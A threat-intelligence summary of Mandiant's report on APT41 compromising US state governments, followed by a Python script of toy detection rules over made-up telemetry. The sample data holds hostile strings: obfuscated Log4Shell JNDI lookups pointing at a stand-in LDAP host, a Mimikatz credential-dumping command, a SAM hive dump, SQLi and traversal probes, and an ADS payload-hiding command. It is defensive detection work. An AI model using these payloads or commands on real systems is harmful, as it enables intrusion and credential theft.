March 15, 2022

Mandiant Reports APT41 Targeting US Government

Industry: Government | Level: Tactical | Source: Mandiant

Mandiant provides insights from engagements involving six U.S. state government entities compromised by APT41. The Chinese state-sponsored threat group appears to have made a focused effort against U.S. state governments between May 2021 and February 2022. APT41's objectives against these entities are unclear; however, the group was observed exfiltrating PII. APT41 obtained initial access by exploiting vulnerabilities in public-facing web applications, including Log4Shell (CVE-2021-44228) in Log4j and a vulnerability in the USAHerds application, CVE-2021-44207. Mandiant details the web application compromise tactics: “In most of the web application compromises, APT41 conducted .NET deserialization attacks; however, we have also observed APT41 exploiting SQL injection and directory traversal vulnerabilities.” Following initial access, APT41 conducted reconnaissance using dsquery and harvested credentials both by gathering them from the registry and by executing Mimikatz. Persistence was achieved through scheduled tasks. For command and control (C2) and data exfiltration, APT41 leveraged Cloudflare services to proxy its traffic. The group's evasion and anti-analysis techniques included storing files in Alternate Data Streams (ADS) and protecting its malware with VMProtect.

  • Anvilogic Scenario: Post Exploitation Behaviors
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • External IP to Internal SQL
    • Web: Potential XSS and SQLi
    • Directory Traversal
    • File Modified for Execution
    • Credentials in Registry
    • Mimikatz
    • Common Active Directory Commands
    • Create/Modify Schtasks
    • Alternate Data Streams
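The behaviours in the summary above map directly onto the use cases listed. As an added example (not Mandiant's engagement data and not the Anvilogic platform's detection content), the Python below runs toy detection logic for several of them over constructed sample process-creation events and web requests. Every host, user, path, IP and payload is made up, and each rule predicate is an assumption about what the behaviour looks like in Windows process telemetry or web-server request data, not the product's logic. The web rules go slightly beyond the list: the Log4Shell check resolves the `${lower:x}` and `${::-x}` lookup obfuscations the way Log4j itself does before looking for `${jndi:`, the traversal and SQLi checks double-URL-decode first, and a .NET rule flags the base64 header of a BinaryFormatter stream (and only that format, so it will miss other serializers).

```python
# Added example: toy detections for the APT41 behaviours summarised above.
# Not Mandiant's data and not Anvilogic's detection content; all telemetry
# below is constructed and every rule is an assumed approximation.
import re
from dataclasses import dataclass
from urllib.parse import unquote


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str    # parent image name, e.g. w3wp.exe for an IIS worker
    image: str     # image name of the created process
    cmdline: str


# Endpoint rules keyed by the use-case names in the list above, plus one
# assumed extra for a web server worker spawning a shell after exploitation.
PROCESS_RULES = [
    ("Post Exploitation Behaviors (web worker spawns shell)",
     lambda e: e.parent.lower() in ("w3wp.exe", "java.exe", "tomcat.exe")
     and e.image.lower() in ("cmd.exe", "powershell.exe")),
    ("Common Active Directory Commands",
     lambda e: e.image.lower() in ("dsquery.exe", "nltest.exe")
     or (e.image.lower() == "net.exe" and "/domain" in e.cmdline.lower())),
    ("Credentials in Registry",        # hive dump via "reg save hklm\sam ..."
     lambda e: e.image.lower() == "reg.exe"
     and re.search(r"\bsave\b.*\\(sam|system|security)\b", e.cmdline, re.I)),
    ("Mimikatz",                       # module syntax survives renaming the binary
     lambda e: re.search(r"sekurlsa::|lsadump::|privilege::debug", e.cmdline, re.I)),
    ("Create/Modify Schtasks",
     lambda e: e.image.lower() == "schtasks.exe"
     and re.search(r"/(create|change)\b", e.cmdline, re.I)),
    ("Alternate Data Streams",         # drive path with a second ':' (file:stream)
     lambda e: re.search(r"[a-z]:\\[^\s:]+:[^\s:\\]+", e.cmdline, re.I)
     or re.search(r"-stream\s", e.cmdline, re.I)),
]

_LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_log4j(text: str) -> str:
    """Resolve Log4j lookup obfuscation (${lower:j}, ${::-j}, ${env:X:-j}) the
    way Log4j itself would, so an obfuscated '${jndi:' prefix reappears."""
    while True:
        new = _LOOKUP_CASE.sub(lambda m: m.group(1), text)
        new = _LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            return text.lower()
        text = new


def _decode(s: str) -> str:
    return unquote(unquote(s))     # strip single and double URL-encoding


WEB_RULES = [
    ("Potential CVE-2021-44228 - Log4Shell",
     lambda t: "${jndi:" in normalize_log4j(t)),
    ("Directory Traversal",
     lambda t: re.search(r"\.\.[/\\]", t)),
    ("Web: Potential XSS and SQLi",    # deliberately narrow patterns
     lambda t: re.search(r"union\s+select|'\s*or\s+\d+\s*=\s*\d+|waitfor\s+delay|<script\b", t, re.I)),
    (".NET Deserialization (BinaryFormatter header)",   # base64 of 00 01 00 00 00 FF FF FF FF
     lambda t: "AAEAAAD/////" in t),
]


def run_process_rules(events):
    """Return (rule, host, cmdline) for every rule that fires on each event."""
    return [(name, e.host, e.cmdline)
            for e in events for name, pred in PROCESS_RULES if pred(e)]


def run_web_rules(requests):
    """Decode every string field of a request and test the web rules on it."""
    hits = []
    for r in requests:
        blob = _decode(" ".join(v for v in r.values() if isinstance(v, str)))
        hits += [(name, r["src"], r["uri"]) for name, pred in WEB_RULES if pred(blob)]
    return hits


# Constructed sample telemetry; the last entry in each list is benign.
SAMPLE_PROCESS = [
    ProcessEvent("web01", "IIS APPPOOL\\App", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent("web01", "SVC\\app", "cmd.exe", "dsquery.exe", "dsquery * -filter (objectClass=computer) -limit 0"),
    ProcessEvent("web01", "SVC\\app", "cmd.exe", "reg.exe", "reg save hklm\\sam C:\\Windows\\Temp\\sam.hiv"),
    ProcessEvent("web01", "SVC\\app", "cmd.exe", "m.exe", "m.exe privilege::debug sekurlsa::logonpasswords exit"),
    ProcessEvent("web01", "SVC\\app", "cmd.exe", "schtasks.exe", "schtasks /create /sc daily /tn Updater /tr C:\\Windows\\Tasks\\u.exe"),
    ProcessEvent("web01", "SVC\\app", "cmd.exe", "cmd.exe", "cmd /c type C:\\Windows\\Temp\\p.exe > C:\\Windows\\Tasks\\notes.txt:payload.exe"),
    ProcessEvent("ws07", "CORP\\alice", "explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
]
SAMPLE_WEB = [
    {"src": "203.0.113.5", "uri": "/api/search?q=${${lower:j}ndi:ldap://203.0.113.9/a}"},
    {"src": "203.0.113.5", "uri": "/", "ua": "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9/x}"},
    {"src": "203.0.113.7", "uri": "/download?file=..%252f..%252fweb.config"},
    {"src": "203.0.113.7", "uri": "/login?user=admin'%20OR%201%3D1--"},
    {"src": "203.0.113.8", "uri": "/app/Default.aspx", "body": "payload=AAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAMAgAAAF9Na"},
    {"src": "198.51.100.4", "uri": "/api/search?q=cattle+count"},
]

if __name__ == "__main__":
    for hit in run_process_rules(SAMPLE_PROCESS) + run_web_rules(SAMPLE_WEB):
        print(*hit, sep=" | ")
```

Running the file prints one line per hit: six from the process events (one per malicious event, none for the benign notepad launch) and five from the web requests (both Log4Shell variants, the double-encoded traversal, the SQLi probe and the BinaryFormatter blob, nothing for the ordinary search). The piece worth keeping is the lookup normalisation: matching the literal string `${jndi:` misses the nested-lookup variants that were common in the wild, whereas collapsing the lookups to their resolved value first catches them regardless of how the prefix was split up. The ADS, registry and SQLi patterns are intentionally narrow and would need tuning against a real fleet's baseline before going into production.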